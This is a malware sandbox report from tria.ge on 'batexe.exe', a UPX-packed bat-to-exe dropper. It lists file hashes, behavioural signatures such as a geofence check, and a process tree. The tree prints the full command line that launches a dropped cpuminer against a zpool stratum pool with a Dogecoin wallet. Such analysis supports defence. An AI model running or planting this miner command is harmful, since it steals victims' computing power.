Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    293s
  • max time network
    296s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-ja
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
  • submitted
    18/02/2024, 11:30

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4336
    • C:\Users\Admin\AppData\Local\Temp\7417.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\7417.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\7417.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2380
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7724.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1340
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:1056

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\7417.tmp\b2e.exe

    Filesize

    5.3MB

    MD5

    86a7de4f150a3b8ded8ffc88df1e23a0

    SHA1

    e568d1c80494271a09cd273e1b42ecff8b87fcf9

    SHA256

    610204b561bc34739ab2ca6450ab1b84b9c8fa92ba6029253c6204458275b9b4

    SHA512

    1069dfc705a964391f9d36aa8ba8c8edf7e4116c0e791ba4236a26ed7ba183dd755c95a3e3a6270f01ef70fdc04f5d5549192256991f83ed01ee39cd649ca341

  • C:\Users\Admin\AppData\Local\Temp\7417.tmp\b2e.exe

    Filesize

    2.0MB

    MD5

    46536105981aa70ae873bad13428c4eb

    SHA1

    7e4f4d36a7047b49af0240e6aa877036880a8277

    SHA256

    b42a088cb7a3a7c8d95d76e940a364bf7963ef757d82867f576e73e16d8c404d

    SHA512

    95df105e1d4fd8a83036986d2ed06684320b2835497a30a980a0fbc18250b384d36245bce4560fa05062019f63b7b4f1c24d746cf41ff99fbe6db14fe041060e

  • C:\Users\Admin\AppData\Local\Temp\7417.tmp\b2e.exe

    Filesize

    3.0MB

    MD5

    269695248f4f2851a27f9ad35489de20

    SHA1

    6cd9f551d87f552192e561c138ca913bd2988053

    SHA256

    98ba713aebc1a7403784a8d66bd51e549e9a60cfb3eaee79bcce121e74e1d58f

    SHA512

    4ea6de812dad400f229ad8a61e92f2feee42713733b8a4fd901325d5cc9e850054b9464afd51cbc63c2c679516e051a3b91b6554383986260a3966e9e00d9709

  • C:\Users\Admin\AppData\Local\Temp\7724.tmp\batchfile.bat

    Filesize

    136B

    MD5

    8ea7ac72a10251ecfb42ef4a88bd330a

    SHA1

    c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

    SHA256

    65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

    SHA512

    a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    893KB

    MD5

    a514d742a6877e6729e8d47bef2d8bec

    SHA1

    0b44941b1266869fe8f1e5b1e1d4b94002523afa

    SHA256

    6d6882aee707734a3cd4186098882c575b53ad06f1f85adfc7125a149580e6b5

    SHA512

    09399e34a1f3d54ae92427fed44a600b7e216a4d75be40a1bf50155f889223827774fc9ae650b2f3d69dbd8601a3b5395ec8b1b4c4835ca0ee8d77e1c10bcddb

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    787KB

    MD5

    7a3a49079006ab8373bb85ceceb1bfe3

    SHA1

    c765034e1de783822e89c207370b5471b4467df2

    SHA256

    2f7f130976140323f4a2954011f932110bb0974bb7a888d9575d3df2b0421fd0

    SHA512

    cfb199dfbeeefbe630eeb7ce2961c3050ab50136c1d03fe0567f9d871ff59b819981ed9de104b6ae4353cb1a96673efdc471a0ebb7544c11fffa82a88abf4bc2

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    784KB

    MD5

    ced80f7102bef31540d534d433ea1152

    SHA1

    2ca3f4dbcb479b73ff7da62e6a89802a3095e8cd

    SHA256

    43aafb1f8da1e94cc63e1f2df8389fbe8efd3cfec19fa1adfd2947635f149664

    SHA512

    76ae64e869b6da7d2de0c3260a5d804a74dd240114cf23ab374d2134a32f4374f25e1b970ffbadb9a7b3744415ee45aaf1b2c39037b0f5f906ff6ae39708e3a4

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    614KB

    MD5

    45d5b8c2b3de3f41a1095b0fc27f18e8

    SHA1

    bd1ee4d71a65bca774c5397effc9a03efb272016

    SHA256

    780292077b3350b0cf729e2852a6a5ce17a1d8e55b633e32f02ea1ff0d5d4068

    SHA512

    129dad8fcdd1090c7a2794ee532c9b126d18f7cb4685a84b98255caa0d8a50371500e366aca6cf5c71026a62fd942103a38249135c59de06081e12fea080f4a8

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    602KB

    MD5

    7fd1ebcd392230c333c32b6cd8fa6796

    SHA1

    adddf1a6856bb269563a8cde1375aa38888a8f7f

    SHA256

    f6b84fb043f7881512ed679fc8e03dd92e62f0c8f778007ab23df220759128a8

    SHA512

    fea310c404ff5bffe428dfae7f0f226515b58a3c34b2507c9a9ea449199a1637e4f0dc6999d75c4716f68ed59e14083c83585598be41bc64156f54e34316b7d0

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    688KB

    MD5

    d29507f0042469e182c5221275f933b9

    SHA1

    186e7bd9bd2d936e9a1e9d11b48c4339df69573e

    SHA256

    d27b541b8db361d9d753dd2ac7efdd48dd184493c588aa89a5c9d09825fb65af

    SHA512

    68caed2157d681b5b9992306bacd2098928f8694ebc2080c9208c4a2552bab6530185ddef920bd9d3a2f729bb059c46a415f4a0bb9400e318bf5bb8336b213c5

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    675KB

    MD5

    ddb211ce515d88f41e2ea86374676a4d

    SHA1

    ceea224d0b3e25de898f3128a5d620de07947144

    SHA256

    cdd7b4d5a030e4cffe37f9241808a430c319d1920c76fc18d7c540943114d190

    SHA512

    328a3edb7bd08fab5189ea9b76a3e1a265dbc6b8d8bfc611a0f002df7ea7035c810065a3284fa71fdac27e26981e253a6615a9e817aff47403f46fe9b7db065a

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    519KB

    MD5

    b1a433eedb81e253e42ac1fb87673dac

    SHA1

    76a4da7a9519e7bc11e240dfb119e5ad5d1afa29

    SHA256

    2b008bf84e33e338556bd9658d37ae9f4fbe05296b84672bc67b85c859f45c51

    SHA512

    4ae6ac17d5e0e1fbc61f760b8752a89965650630a1561c047e536042d0fef043dedfbf0db9ba10b5b7cb363463127a11146de57b05439032b03b358ec9f87c24

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    828KB

    MD5

    6296624947cde2acedd58303f9e4150c

    SHA1

    1c6976d0c7b0bb3e9f2535c60a294f14c19317c7

    SHA256

    ecdeaab7bcce3f29618db21029acbb335bbb295e8d2e2216873d5df11258088a

    SHA512

    ce878bf3b75bdaff33f6ed97775117fd66941b3909885e40f5d5bc1d5af37654d860c204b10492b9ec402f2beabab896108bc5bfc4ffc83e6d63d3ebde8a9b2c

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    457KB

    MD5

    7e089ae00911e383f313993a289a3315

    SHA1

    e01b127d643ec7923e3148a53055f9dba4af3c6e

    SHA256

    088eaff64eb307aa0b344999b5751751552817a056fdf34a6c8bec985d10b29c

    SHA512

    ad9602442073a0b924dc7ebd4bf3dfa2ff622c22fe20694d3e2e73e51fb6c360a4b50718d942236a9001f667ffa472908cddcf8786e171198e7c2899aab1287c

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    606KB

    MD5

    585efec1bc1d4d916a4402c9875dff75

    SHA1

    d209613666ccac9d0ddab29a3bc59aa00a0968fa

    SHA256

    2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

    SHA512

    b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

  • memory/1056-48-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1056-59-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1056-43-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1056-44-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

  • memory/1056-45-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/1056-46-0x000000005BE40000-0x000000005BED8000-memory.dmp

    Filesize

    608KB

  • memory/1056-47-0x0000000000F30000-0x00000000027E5000-memory.dmp

    Filesize

    24.7MB

  • memory/1056-99-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1056-94-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1056-89-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1056-54-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1056-64-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1056-69-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1056-79-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1056-84-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2380-53-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/2380-7-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/4336-9-0x0000000000400000-0x000000000393A000-memory.dmp

    Filesize

    53.2MB